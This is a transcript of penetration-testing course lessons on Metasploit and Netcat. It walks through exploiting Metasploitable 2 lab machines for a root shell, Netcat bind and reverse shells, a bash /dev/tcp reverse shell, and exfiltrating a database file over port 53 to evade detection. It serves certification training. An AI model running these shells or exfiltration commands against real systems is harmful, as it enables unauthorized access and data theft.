CompTIA Pentest+ PT0-002 – Section 10: Network Attacks Part 5

96. Intro to Metasploit (OBJ 3.1)

In this lesson, we’re going to talk about Metasploit which is a multipurpose computer security and penetration testing framework. It contains a lot of great things inside of Metasploit. Now it comes installed by default inside of Kali and Parrot Linux and most other penetration testing distributions, because it is probably the number one tool the most penetration testers are going to use. To launch it, simply type in msfconsole for Metasploit framework console, and hit Enter. When you do that, the Metasploit framework is going to load up. Now it takes a couple of seconds for it to load. And every time you load it, you’re going to get a different splash screen. In this case, we have this big C-looking thing with a lot of words in it.

Every time you launch it, you’re going to get a different one, and usually there’s some kind of a joke or pun inside of those. More importantly, though, you can see down at the bottom that I have Metasploit framework, version 6.1.27. And it tells me how many exploits, auxiliaries, posts, payload, encoders, nops, and evasions there are. Now, what are all of those things? Well, let’s talk about them. First, we have exploits. You can see here there are almost 2200 different exploits. An exploit is simply some piece of code or software that can deliver a payload and do some sort of an attack on a given target. All these different exploits go after different vulnerabilities on different Windows, Linux, mobile, and other systems that you may encounter in the field. The second category we have there is known as auxiliary.

Now, auxiliary, there is over 1100 of these inside the Metasploit framework. This includes scanners, sniffers, fuzzers, spoofers, and other non-exploit features of this toolset. For example, instead of using Nmap to do your port scanning, you can actually use auxiliaries that are set up inside of the Metasploit framework to do that same type of work. The next one we have is what’s known as post and you can see there are 400 as of this version. Now a post is basically any additional task that you may need to perform on a compromised host. And post stands for post-exploitation, which means once you broke into the box, what are those things you need to do to maintain persistence, cover your tracks, and other things like that. Next, you’ll see we have payloads and we have almost 600 payloads in this version. Essentially, payloads are what exploits are going to deliver and then run. When you run those payloads, it gives you control over machine, or it gives you elevated permissions or something like that. Next, we have encoders and there’s 45 encoders in this version. Now encoders are used to ensure the payloads make it to their destination in one piece and undetected. You may encode things or encrypt things to bypass different intrusion detection, firewalls, router ACLS, and things like that. We also have nops, there are 10 different nops here.

Now, a nop is a non-operation. Nops are used to keep the payload sizes consistent across all the different exploit attempts that you’re going to do. This is also useful as part of your evasion. And finally, we have a evasion. This is a category that has nine different types of evasion techniques that, again, you can use as ways to try to get by or get through some sort of defenses that somebody is set up against you. Now you’ll notice once you go into the Metasploit framework, you come up to the Metasploit prompt. And here you can see it says msf6, telling me I am in version 6 of the Metasploit framework. Now, when you go and use the Metasploit framework, you need to tell it what tools you want to use. So everything is built up in a specific pattern. They list it out by the module type, saying if it’s an exploit, auxiliary, post, payloads, encoders, nops, or evasion, then the platform that you’re targeting, Windows, Linux, Apple, et cetera, then the target service, SMB, FTP, whatever that happens to be, and then the module name. So to use one of these things, you simply have to list out its name.

Now that’s easier said than done because there are so many of these, right? But I have one memorized that I use all the time. And so I would just type in use exploit/windows/smb /ms17_010_psexec. Now, what is this says? This says I want to use this exploit that targets Window systems over SMB using the vulnerability associated with Microsoft patch 010 in the year 2017. And if you’re not familiar with this, this was known as a tunnel blue, which was a large vulnerability back in 2017 and made up the core of the ransomware known as WannaCry. When you hit Enter, it’s going to then load that module for you to use. Notice my prompt has changed. It now says msf6 exploit and then in parentheses, what exploit I’m going to be using. Now from here, we would have to look at the different options that are available for this particular exploit. To do that, simply type in options. When you type in options, you’ll see all the things in this table that you have to have a setting for in order to use this attack. For instance, do you want to have the setting true or false for debug trace? And this shows extra debug information. You’ll notice this is a required field.

As you go through the there’s going to be different things you’re going to use based on this particular exploit and every exploit and every auxiliary and post and nop is going to be set up differently. But by using options, you can always see what options need to be made. In this case, one of the things that’s required that has not been set yet is the RHOSTS, which is the target host you want to go after. For example, if during my information gathering and vulnerability scanning, I identify that there was a workstation with a certain IP address that might be vulnerable to this attack because it was missing this patch, I could then use that as my RHOSTS. And to do that, I’ll just type in set, the option I want to set, in this case, RHOSTS, and then the IP address of that machine. Let’s say it was 192.168.1.2 and hit Enter. Now you’ll see that it is set that RHOSTS to that IP address. And if I type in my options again, you’ll see now that everything that is required has been filled in.

And this is the way you use these different tools inside the Metasploit framework. When you see things like RHOSTS, that is the remote host or the IP you want to target. RPORT, the remote port you want to target. Things like LHOST and LPORT are the local host and local port. Notice, you’ll see the payload options down at the bottom. The payload options here is what are we going to do once we run that exploit. Just exploiting something doesn’t do you any good. You have to run some kind of code afterwards. And in this case, we are setting up a reverse TCP shell using the Meterpreter shell inside of Metasploit. This will allow us to have a connection to that machine and then do things on that machine that we want to do as part of our post-exploitation, like doing more information gathering, collecting files, and doing data exfiltration, changing settings, pivoting to other machines and all of those type of things. Now there’s a lot to Metasploit and we’re not going to cover all of it in this video, because that can be an entire course of 20 to 40 hours on its own. But what you need to understand is that Metasploit is a very powerful framework, and you should be able to understand the very basics of setting up things like options, and then running those exploits.

If this option was already set up perfectly and I’m ready to run the exploit, to do that, I would simply type in the command run and hit Enter. Now, in this particular case, I’m not on a network where there is a vulnerable host at 192.168.1.2. So if I try to run it, it’s going to end up failing because it’s not going to be able to talk to that particular device because it was unreachable as you saw here. Now, let me go ahead and show you how we use this in the real world. To do this, I’ve gone ahead and set up a vulnerable machine called Metasploitable 2, and you can download this from Rapid7 who created this. This is a Linux distribution. It is intentionally vulnerable and has lots and lots of different problems with it. And that is good for us to be able to practice on. So what I want to do is I want to get out of this particular exploit. So I’m going to type in exit and you’ll see that that took me out of the entire Metasploit framework. So now that I have a nice clear screen, what we’re going to do is we are going to search on this network using Nmap to try to identify what is that particular vulnerable machine’s IP address.

And I know this on the same local area network as I’m in, so I’m just going to type in ifconfig to find out my IP address, which is 172.16.218.128. And so I’m going to use Nmap and I’m going to scan 172.16.218.128/24 because I’m not sure what the IP address is of that vulnerable machine. When I do this, Nmap is going to go out and scan the entire network of up to 254 hosts on this subnet. Now, as it comes back, you’ll see that we found a couple of things. Let me scroll up a little bit so we can see what we have. And you’ll see that Nmap went and found two different hosts that were reporting back ports. The first one was located at 172.16.218.1, and that is my router or gateway. And you’ll see that there is an Apple file server and there is upnp that is open on those particular ports. Now the more important one is the one that we see here at the bottom. 172.16.218.130. This is my vulnerable machine. And you’ll notice, there are a lot of different things on this machine. Notice that there are 23 open ports, and these are things like FTP, SSH, telenet, SMTP, domain, HTTP, rpcbind, many others.

Now, if we wanted to find out more information about these particular ports, we could do that by fingerprinting those ports or using Nmap with a service scan to figure out what they’re running. And that’s exactly what I’m going to do. So I’m going to use Nmap, I’m going to target just the IP that I want to go after, which is 172.26.218.130, and I want to do that with a service scan of -sv. If I go ahead and hit Enter, it’s going to go run off and do that scan for me. All right, now that the results are back. We can look at those particular services and see if there’s anything that’s vulnerable. Now, this is where you’d normally do your information gathering and vulnerability assessment part of your engagement. Now I’ve already done this, and I know that port 6667, that is open for IRC using the UnrealIRC daemon, is a vulnerable version. And so that’s what I’m going to target and show you how to use Metasploit to go after and exploit the vulnerability in that UnrealIRC demon. To do this, we again, need to go back into the Metasploit console. So we’re going to go msfconsole, and when we get up into that screen again, we are going to use the vulnerability for the UnrealIRC daemon. Now, the first thing I want to do is search for that vulnerability to see if there is any exploits associated with it.

So if I type in search irc, I can hit Enter. And all the things that have IRC in it are going to show up. If you look down at line 18, there is one for exploit/unix/irc /unreal_ircd_3281_backdoor. Now, what this mean is that this is an exploit that targets Unix systems, which is what Metasploitable is, it targets the IRC port, which is what was open at 6667, and it targets the UnrealIRC daemon version 3281, and there’s a backdoor in that particular version. And so that’s what we want to use. Now, to use it, I can type out the entire thing of use exploit/unix/irc /unreal_ircd_3281_backdoor or I can use it based on its number. And in this case, it’s number 18. So I’ll go ahead and hit 18. And you’ll notice, it is now the one listed as my exploit. So we’re going to go ahead and look at our options. And for our options, we only need to set two things. The RHOSTS and the RPORT. Now we already know what the RHOSTS is. In this case, we’re going to set our RHOSTS to 172.16.218.130, and hit Enter. Now, the port is port 6667, which is the port that was running on our server. If it was running on a different port, we would just type in set port and the port we want to set it to.

Now, I’m going to go ahead at options again, to make sure it took. And yes, it did. I can see my RHOSTS is now there. Now that we have our RHOSTS and RPORT set up, we are ready to run this exploit. But if we do that now, nothing’s really going to happen because we’ve set an exploit, but we haven’t set a payload. And a payload is necessary to say, “What do you want to do once you exploit this server?” So I’m going to show you what that looks like, just so you can see the error. And if you hit run, it’s going to go off, it’s going to try the exploit, but it fails. Why did it fail? Because a payload was not selected. So as you can see, there was no payload, so we have to be able to set a payload. To do this, we’re going to type in show payloads and hit Enter. And this will show us all the compatible payloads that are known to work with this particular exploit. And here you can see there are 11 different payloads.

To keep things simple, I’m going to use the first one, which is payload/cmd/unix/bind_perl, which is going to set up a bind shell on that remote server so that I can connect into it at any time I want and take over the system. To do this, we’re going to use set payload and then the name which is cmd/unix/bind_perl. Notice this is a little bit different than when you’re using an exploit. When you use an exploit, you’re going to say use, space, and then everything after that is all one big word with the slashes between it. But with payload, it’s set payload, and then the command, the system, and the payload you want to use. Go ahead and hit Enter there, and then hit show options. When you do this, you’re going to be able to see the configuration for both the exploit and the payload. For the exploit, we’re going to go and connect to that IRC server at 172.16.218.120 over port 6667.

We’re going to then send a payload that is a bind shell that’s going to bind on that IRC server and open up a connection port at 4444. This will allow me to connect to that remote host anytime I want over port 4444, and be able to access this bind shell using Perl. Now, to run this, I’m simply going to type in run and hit Enter. You can now see that we are connecting from our Kali machine to that server over port 6667. We set the backdoor command and we were able to start that bind TCP handler on that remote server of 172.16.218.130 over port 4444. And now I have a valid connection that is called command shell session 1 that is open between my Kali machine, 172.16.218.128 from port 46773 over to the remote shell that I created with that bind shell on port 4444 of that IRC server. Now you’ll see that nothing really happened. We’re just sitting there and we are at, basically, a blank screen. Why is that? Well, because we’re actually had a command prompt, you just don’t know it. And so if you want to see where you are, you can use your Linux commands like pwd to figure out what is the working directory you’re in. And I am right now in the /etc/unreal directory. If I want to see the files in there, I can type in ls and I get back the answers of donation, license, aliases, and all the other things that are in that directory. If I want to figure out what type of permissions I have, I can do whoami. And when I do whoami, I am root. I was able to get into this box using root access by running this particular exploit. And that’s the way these things work at a very basic level to set up an exploit, set up a payload, and then run an attack. Now, the last thing I want to show you is this concept of sessions.

Notice here, it said the command shell session 1 was opened. That means there might be other sessions, too. What this is, is that Metasploit allows you to run multiple sessions, so you can do multiple different attacks, or if you need to chain exploits across multiple systems, you can do that. Now, right in now, I’m in session 1 and I’m at the command prompt on this IRC server. If I want to get out of that, I can press Control + Z and this will send that session to the background. When I hit yes, that allows me now to get back to my Metasploit framework prompt. Now I can go and set up a new exploit and a new payload and a new target and run that and that will become session 2. If I want to see all the sessions that I have going on, I can do that by simply typing in sessions and then -l to list them. You’ll notice right now, I only have one session because that’s all I’ve done, but I could be working here all day and have 5, 10, 15 sessions running at once. Now, if I want to use a different session, I would just type in sessions and the number that I want to use.

For instance, session 2 or 3 or 4. In my case, I only have one session, so I’m just going to select session 1. And that brings me right back into session 1. And again, I’m right back on that terminal. Now if I do whoami, I’m root. If I do ls, I’m in that directory. If I wanted to create a file or a directory, I can do mkdir test. And now if I do ls, you’ll see there is this test directory that was just added by me. If I wanted to remove that directory, I can do rmdir test. And now if I do ls, that test is no longer there. These are all the different things you can do just from a very high level when you start using Metasploit. Metasploit is a truly powerful tool and it’s one that, as a pen tester, you really got to become comfortable with. Now, for the exam, you just need to know the basics. What I did today by setting up different exploits and payloads, and being able to go from one session to another, that’s as deep as you need to go for the exam. But for the real world, I definitely recommend you take an in-depth course on Metasploit or you spend some time with Metasploit, it’s documentation, and some vulnerable machines from VulnHub, or Metasploitable 2, and be able to start using this to conduct your attacks, and being able to get better at doing pen testing in the real world.

97. Netcat (OBJ 3.1)

Our goal as a penetration tester is to gain access to a remote server or workstation and then take control of it through the use of an interactive shell. This is usually done by installing a Remote Access Trojan or by using a raw socket connection tool like Netcat. Now, Netcat is also known as NC because this is the command that you’re going to enter inside of Kali Linux as a command line utility for reading and writing raw data over a network connection. This tool can be used to create bind shells and reverse shells for your use during your penetration test as well. A shell is simply an interactive command interface just like the one you’re using when you enter commands into your Kali Linux Terminal. When you create a remote all connection though within that victim machine, that shell connection is going to be defined as either a bind shell or a reverse shell depending on which machine is being set up as the listener, the victim’s machine or yours. A bind shell is a shell where a listening port is opened on the victim’s machine and that exposes the Command Prompt on the local host to the attacker who connects to it through that listener. For example, if I’m able to hack into your workstation and set up a listener on your machine and I open up port 443 on your workstation, I can then connect to your listener using Netcat on my Kali Linux machine using your IP address and port 443 to be able to connect to your machine and then that listener is going to redirect commands I send directly to your shell or Command Prompt for execution by your local host.

Essentially, this gives me a two-way connection much like an SSH client with an SSH server. Now, bind shells worked great for a really long time, but as security increased and firewalls were installed at the network boundaries, they became less and less of effective. After all, not only would I need to install the listener on your workstation and open up port 443 on your host firewall, but now I also need to ensure that port forwarding is enabled on your router that redirects me from the WAN connection to your specific workstation on your internal local area network. The benefits of a bind cell is that the system is just sitting there and waiting for you to connect to it as the attacker because you can access it any time you want. This works really well if you’re already inside of the network so you don’t have to worry about the border gateways firewall or the port address translation. Unfortunately, though, most of us are going to be attacking our targets from outside of the network and across the internet, so a bind shell isn’t going to be very are effective for us. To solve this issue, we’re instead going to use a reverse shell. Now, with the reverse shell, the attacker installs the listener on their own workstation and they configure a listening port on that workstation. Then they cause the victim to initiate a request to that listener. When they connect to the listener, a two-way connection channel is going to be established and the attacker can then issue commands directly to the victim’s shell or Command Prompt once again. Reverse shells are very popular with penetration testers because even if the victim is behind their corporate firewall, it’s going to open up an outbound port for traffic that’s destined for an external IP address over port 443 because that’s how it’s configured. Just like when the user tries to go to diontraining.com, their computer’s going to initiate a connection to that external IP over port 443. Well, the same thing happens when they try to connect to the listener that you’ve established on your attacking workstation. Now, most organ organizations have configured their firewalls to allow traffic to return into a network once that initial request was made from inside of the network going out and so you’re now going to be able to continue to communicate with that victim machine moving forward until the connection is eventually lost or it’s terminated by that victim machine.

So you might be wondering how do we get our victim to initiate that connection? Well, normally we’re going to do this by installing malware on the victim system by writing an exploit against a known vulnerability or tricking that user into installing the malware themselves through some kind of a social engineering technique. Once it’s installed, the malware can set up scheduled tasks to call out to your listener every day at a certain time and once that connection is made, it can be made up for days or even weeks, or if you want to be even more stealthy, you can have the connection terminated whenever you’re not using it, but set up that victim to call home to your listener every day or every few days. If you use this approach, it is going to be more stealthy for you, but you are going to have to wait for a while if you happen to lose your connection for some reason during your attack. Now, Netcat is a really important tool so you should spend some time playing with it and learning the syntax required to set up a bind shell and a reverse shell. For a bind shell, you simply enter nc -l for listening, p for port, 443 for the port you want to listen on and -e for execute and then cmd.exe for the command you want to execute, in this case, the Windows Command Prompt. What this is saying is that I want Netcat to set up a listener on port 443 and execute the command, cmd.exe, whenever somebody connects to it. It’s a really simple command and I haven’t even set up any password protection or encryption on this particular connection, but it gives you the idea of how you can use Netcat.

Now, as the attacker, if I want to connect to that listener on the victim machine, I would simply type in nc 10.1.0.1 443 and then hit enter. This says, Netcat, go out and connect to the listener that’s located at the IP address 10.1.0.1 that’s listening port 443. Now, when I execute this command, I would expect to get back a C prompt showing that I’m connected to a Windows machine and I have direct access to its Command Prompt. Now, if I wanted to set up a reverse shell, I would use very similar commands, but the biggest difference is that the location of the listener and the command execution primer is going to be reversed. For a reverse shell, I’m going to enter nc -l -p 443 on my Kali Linux machine which is my attacking machine and then I’m going to enter nc 10.1.0.2 443 -e cmd.exe on the victim’s Windows machine. This will allow me to connect to my Kali machine from that Windows machine. Notice, I’m still going to gain access to the Windows Command Prompt on the victim machine.

The only real difference here is that the listener set up on the attacker’s machine and the command being executed is being stated on the victim’s machine. Now, you can get at a bit more creative when you’re using Netcat if you want. For example, you can use scripting and redirection to send and receive files as part of data exfiltration if you need to during your penetration test. For instance, if I set up a listener to receive a file, I might use something like Netcat -l -p 53 which will allow me to send a file over a non-standard port for our file transfer and that way I could try to hide it inside of DNS traffic over port 53. Then I can pipe or redirect any data received into a file called database.sql. On the victim machine, I can then enter the type command which is basically going to tell the system to print that file to the screen, but instead I want to a type database.sql and then pipe it or redirect it into the Netcat command. The command I enter might say something like nc 10.1.0.2 53, which is the IP and port of the listener I set up on my attack workstation. So now I have the victim machine typing that file over to Netcat which is going to send it to my listen center and my listener is going to write everything it receives to a file. This use of the non-standard port of 53 was done so that I could evade detection. Most organizations have ports like 80, 443 and 53 open so that their employees can browse the internet, access DNS and things like that, but by using Netcat, I can send any type of data, text or files over those ports too.

98. Using Netcat (OBJ 3.1)

Let’s take a look at how we can use Netcat to create bind shells and reverse shells. First, let’s do a bind shell. Now, if you remember a bind shell means we’re going to initiate the connection from our attacking machine over to our victim machine. Now on my screen, I have Kali Linux on my left which will be my attack machine. And I have a Windows 10 machine on the right which will be my victim machine. For this to work, we have to exploit our Windows 10 machine in some mechanism that gives us access tool to run a listener on that machine. Now, for the purposes of this demonstration we’re not going to worry about how we got onto this machine but we’re just going to go and set up that listener using Netcat. In the real world, you would do this using spear fishing, social engineering or any kind of other network or application based attack by installing malware onto the machine that contains that listener with Netcat installed. But for the purposes of our demonstration we’re going to do this a lot simpler by simply opening up the command prompt. Now I’ve already downloaded Netcat and installed it onto this Windows machine. But again, in real world, you’d have to do this using some kind of malware or some kind of social engineering tactic. Now to set up the listener simply type NC to launch Netcat -lp for listening port, port 443 is the port I want to listen on, e for the command I want to execute whenever a connection is made to this listener.

And in my case, that’s going to be the command prompt, cmd.exe. Once you do that, hit Enter. And now you’ll see it’s just sitting there waiting for a connection and nothing’s going to happen until somebody tries to connect to this Netcat Listener over port 443. So let’s jump over to our Kali Linux attack machine and make a call out to that listener using Netcat. To do this we’re going to type in nc for Netcat, the IP address of the Windows machine that we want to connect to, in our case, 172.16.218.129, and then the port 443. When I do this, I should get a Windows command prompt inside of my Kali terminal showing that I now have a connection between the two machines. Now on the right, you’ll see, nothing’s really happened because all it’s doing is taking whatever information I send in through Netcat to that Windows machine and executes it inside of the command prompt because that’s the command I wanted to execute using that -e syntax. Now, what I want to do is minimize this command prompt so you can see my desktop and I want to show you that we do have a two-way connection between these two machines. So from the machine on the left, the Kali machine, I’m going to go ahead and do a directory listing. Now I’m inside the User folder for Dion Training and you could see there are folders like the Desktop, Documents and Downloads.

I want to go ahead and move into the Desktop folder. Now from here, if I do a dir command, you’ll see is nothing except for the Google Chrome link on the desktop. And you can see that’s accurate because on the right side of the screen, you only see the Google Chrome link. Now, if I wanted to leave some evidence that I have been able to hack into this machine using Netcat, I can do that by echoing out something like “This machine has been hacked”. And then I’m going to pipe that over to a file that I call hacked.txt and we are in the desktop folder. So when I hit Enter, that’s going to show up over on the right hand side as a text file. Now, as you can see, when I open that file it says this machine has been hacked, and this is evidence that we were able to exploit that machine using Netcat over the network and be able to add or remove things to that machine. Now, if I wanted to get rid of that, I can do that as well. ‘Cause again, I have a full command prompt tied to that Windows machine through my Kali terminal now. If I wanted to delete that file, I can do that as well.

Because again, from the Kali machine I have remote access into the Windows command prompt for the machine on the right hand side. To do that, I’ll simply type in del hacked.txt and hit Enter. And you’ll see that on the right side that file has now been deleted and removed from the desktop. This is what you can do when you have a bind or reverse shell between the two machines. All right, if I want to go ahead and get out of this shell what I’m going to do is just type in the word exit and that’s going to leave or exit the command prompt from that Windows machine. This will return me back to the Kali terminal. Now on the right hand side, you’ll see, that it is also exited out of that listener command. And so it’s not ready to listen to another command. If I tried to run that command from the Kali machine again there’s no one to answer the call. Now, if we wanted to go ahead and be able to answer that call I can simply arrow up on the right hand side and hit Enter. And now there’s a listener there. It now has answered the call. Notice that the attack machine, when you are sending out that command to be able to connect to that IP address over port 443, it’s going to continually try to do that until it finds a listener there. Now this can be seen in the network defense logs on that defender side. So you don’t want to do this if there’s not a listener set up. But again, this is something you can do where you can basically keep saying, “Are you there?” Are you there? Are you there? Are you ready for me?” And eventually when that listener is set up it will then allow that connection to occur. Now, a better way to do this is to use a reverse shell though. All right, let’s go ahead and exit out of that. And you’ll see that we now have disconnected from both sides. I’m going to go ahead and clear my screen to bring us back to the top of each of the screens. And that way we can start with our demonstration of a reverse shell.

Now a reverse shell is basically the same thing we just did with the bind shell, but it’s backwards. Instead of us having the attacker box, making the connection over to the target, we’re instead going to have the listener set up on our attack box and make the target call out to us. This is a much more effective way of doing things in the modern way of networks. And the reason is that we have things like firewalls in place that will block us going into somebody’s network. But they’re all set up to allow their internal employees to access things on the internet. And when they establish that connection or make that request, it then remembers that. And lets you come back in through the firewall as a return response to the request that was made. So on the Kali side, we’re going to set up our listener, again we’re going to use nc -lp 443 and then we’re just going to hit Enter. And now it’s just going to sit there waiting for anybody to connect over port 443. Now on the right side with our victim machine we’re going to type nc 172.16.218.128 which is the IP of the listener on the Kali machine. We’re going to do that over port 443. And here’s the big difference. When we make that connection we are going to do the execution command on our local machine using cmd.exe.

Now, this is really the big difference between a bind shell and a reverse shell. With a reverse shell, the listener is set up on the attack machine but the command execution is set up on the victim machine. When I hit enter, you’re going to see that on the Kali side we now have access to that Windows command prompt and everything works just like it did with a bind shell. The only difference is who was requesting that initial connection. Now in the real world, how would you have this happen using that reverse shell? Well, you’re going to end up having some piece of malware or a beacon that’s going to be established from that Windows machine and maybe every day at 3:00 AM. It’s going to call out to that listener on the Kali machine to make that connection. So we can then do whatever it is we want to do on that Windows machine. This is a method of having persistence that you’re going to have inside of your networks during your engagement. All right, for our final example, I want to show you how you can use Netcat with other tools that are natively installed on the victim system. So for this example, I’m going to be attacking from the Windows machine over to the Kali machine ’cause I want to go and attack its shell. Now for this example, I’m going to use a reverse shell on the Windows machine. So it’s nc -lp 443 and hit Enter. Now it’s just going to sit there waiting for a connection. Next we’re going to go over to the Kali machine, which is now our victim in this case. And we’re using this to stimulate something like a Linux server that you may have hacked as part of an engagement. Now, if they don’t have Netcat installed you can use the native Bash shell and be able to create a connection between these two. So, from the terminal on that Linux machine, you can type in bash -i >& /dev/tcp/ the IP address that you want to connect to which is 172.16.218.129 in my case, slash the port number, which is 443 and then we’re going to use 0>&1. And this is going to send everything from the Bash shell over to the Windows machine. And you can see, I now have a prompt that says kali@kali over on the Windows side.

Now what I’m going to do is I’m going to create a second window and you can see that here. And I’m going to go ahead and bring it down a little bit. Now, from the tilde directory you can see that I have the Desktop, the Documents the Downloads, Music, Pictures, Public, Templates and Videos on my Kali machine. Now, if I wanted to go into, for instance, the Desktop I would just type in cd Desktop and from the Desktop you’ll see there’s nothing there because my desktop on the Kali machine is blank. Now on the right side, if I want to be able to put something there like that hacked file we did before, we can do that. First, we need to figure out what directory are we in on the Kali machine? Well, you can see there It says kali@kali and the tilde and then all that gobbledygook on the screen. So if I wanted to go into the Desktop directory, I can see ls, those directories match up with the ones I see on the left.

And I’ll just use cd Desktop. Now from the Desktop, there’s nothing in there because there’s nothing on the Kali’s desktop, but we’re going to put something there by using the command touch and then hacked.txt which is just going to create a blank text file called hacked.txt on the Kali desktop. When I hit enter, you’re going to see on the left side that we now have a file on that desktop called hacked.txt. And if I go ahead and minimize my terminals you’ll see that’s now sitting there right on the desktop. Now, it’s a blank file because all I used was touched and I didn’t put any content in here but I could say here is the secret password and I can save it. And if I close it, now, if I go back onto my Kali terminals you’re going to see that file is there, but on the right side I can actually read that file because again, any Linux command will now work because I’m tunneling it over into that Kali machine. So if I do ls, I see the file hacked is there. If I do cat, I can display the contents to the screen. Like here is the secret password. And so you can see how powerful it is to be able to create these reverse shells using Netcat or using the native tools like Bash to be able to do it as well.

• Category: Uncategorized